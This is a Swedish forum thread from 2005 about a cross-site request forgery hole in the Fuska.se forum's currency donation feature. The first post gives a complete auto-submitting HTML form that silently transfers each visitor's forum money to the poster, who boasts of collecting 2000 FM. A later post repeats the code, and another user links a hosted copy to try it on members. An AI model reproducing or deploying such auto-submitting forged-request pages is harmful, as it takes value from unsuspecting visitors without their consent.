💬
Logga in
Fuska.se

Säkerhetslucka

27 svar · startad

#1

OK, tidigare idag så gick det att göra ett automatiskt forumlär(på ens egen sida), som lurade alla som besöker den att donera pengar till någon. :ph34r:

Jag upptäckte den och fick hela 2000 FM. B)

 

Demo:

<html><head><title>Sucker!</title></head>
<body onload="document.forms[0].submit();"><form action="http://forum.fuska.se/index.php?act=store&code=dodonate_money" method="post"><input type="hidden" value="10" name="amount"><input type="hidden" value="henke37" name="username"><input type="hidden" value="Sucker!" name="message"></form></body></html>

Den är fixad nu, men det är inte omöjligt att jag kommer på ett nytt sätt att ge mig FM.

#2

Demo:

<html><head><title>Sucker!</title></head>
<body onload="document.forms[0].submit();"><form action="http://forum.fuska.se/index.php?act=store&code=dodonate_money" method="post"><input type="hidden" value="10" name="amount"><input type="hidden" value="henke37" name="username"><input type="hidden" value="Sucker!" name="message"></form></body></html>

Va ? Jag hänger inte riktigt me :blink:
#3

Ok, det är en hemsida med titeln "Sucker!".

Den har ett formulär som kommer skickas till sidan som sköter penga överföringen.

Formuläret har tre dolda fält, vem som ska få pengarna, hur mycket den ska få, och ett medelande till motagaren. De fälten är satta till mig som motagare, 10Fm som "donationen" och kommentaren "Sucker".

Den har ett javascript som automatiskt skickar formuläret.

Senast ändrad:

#4

Du kunde ge koden till mig annars :P

#5

Förstår inte så mycket. :huh:

#6

Jag måste bara testa det: http://medlem.spray.se/h4xx0r/H4xx0R.html

#7

lol det går att lura om man har mindre än det

#8

Asså jag fattar inge ting vad är du försöker säga för nåt :o <_<

#9

Kolla på http://medlem.spray.se/h4xx0r/H4xx0R.html så förstår du

Moderator Moderator
#10

förstår ändå inget av detta... <_<

#11

Prova igen ibland måste man trycka upp till 10ggr på den där länken för att den ska funaka.

14 Jan 2005
#12

Ta FM med ett javascript, jag trodde kodare var seriösa... <_<

#13

jag fattar ingeting

Senast ändrad:

#14

Ta FM med ett javascript, jag trodde kodare var seriösa... <_<

Det är vi också, om jag hadde gjort en tråd och infogat en bild som pekade på sidan, så att jag fick fm, då skulle jag vara oseriös.
#15
Ingen klickar på länken han tar FM från er. :angry:

Senast ändrad:

#16
(Mario Bros. @ 14/01-2005 17:02:49)

Ingen klickar på länken han tar FM från er. :angry:

dahh... svårt att fatta det??
#17

Jag tänker inte klicka.

#18
(H4xx0R @ 14/01-2005 16:12:42)
(Mario Bros. @ 14/01-2005 17:02:49)

Kolla på http://medlem.spray.se/h4xx0r/H4xx0R.html så förstår du

Ingen klickar på länken han tar FM från er. :angry:

dahh... svårt att fatta det??

Vad menar du??
#19

Jag klickade på länken, men jag förlorade inga fm!

#20

Vi kanske ska låsa tråden nu när Henke37 och H4xx0R haft sitt lilla roliga?

Vill du vara med i diskussionen?

Bli medlem Logga in